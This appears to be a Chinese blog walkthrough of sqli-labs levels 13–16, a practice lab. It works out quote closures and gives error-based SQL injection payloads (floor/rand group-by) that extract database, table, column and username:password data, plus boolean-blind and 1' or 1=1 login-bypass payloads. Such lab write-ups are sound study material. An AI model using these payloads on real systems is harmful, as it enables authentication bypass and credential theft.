Less-13

尝试输入username=1',password=2',没反应,输入username=1",password=2",报错了

image-20200215133013649

可知这里是')闭合,但是构建之后输入order by 1等语句没有回显,考虑报错注入

1') union (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#

注入后显示超过一行,说明列不止一个,尝试加入一个列

1') union select 1,(select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#
image-20200216100310618

成功爆出当前数据库为”security”,接下来就是常规操作了

爆表

1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))#
image-20200216100813605
1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2)))#
image-20200216100900022
image-20200216100919033
image-20200216100943581

修改元素可爆出所有表(最后一次爆全部,后面的都这样的)

爆字段

1') union select 1,(select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2)))#
image-20200216101113949

爆数据

1') union select 1,(select count(*) from information_schema.tables group by concat((select concat(username,0x3a,password) from security.users limit 0,1),floor(rand(0)*2)))#
image-20200216101254574

Less-14

尝试输入username=1',password=2',没反应,输入username=1",password=2",报错了

image-20200216102024567

可知这里双引号闭合,构造pyload:2" or 1=1 #,经测试和Less-13一样的解法

Less-15

尝试输入username=1',password=2',没反应,输入username=1",password=2",也没反应…

有可能不会报错了,尝试password=1' or 1=1 #,发现成功登入…

这里可以利用or性质来判断后面我们构造的payload是否正确,bool注入

爆库:

1' or (left((select database()),1)='s')#

详细bool注入参考我前面的博客,可丢bp里爆破

爆表

1' or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'#

Less-16

尝试输入username=1',password=2',登入失败,输入username=1",password=2",登入失败…

有可能不会报错了,尝试password=1' or 1=1 #,登入失败,password=1" or 1=1 #,登入失败…

继续尝试password=1") or 1=1 #,登入成功,害…

后面就和Less-15一样了,稍微改下符号就可以了

说点什么
评论之后转圈圈也不用管,要批准之后才能显示,谢谢
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...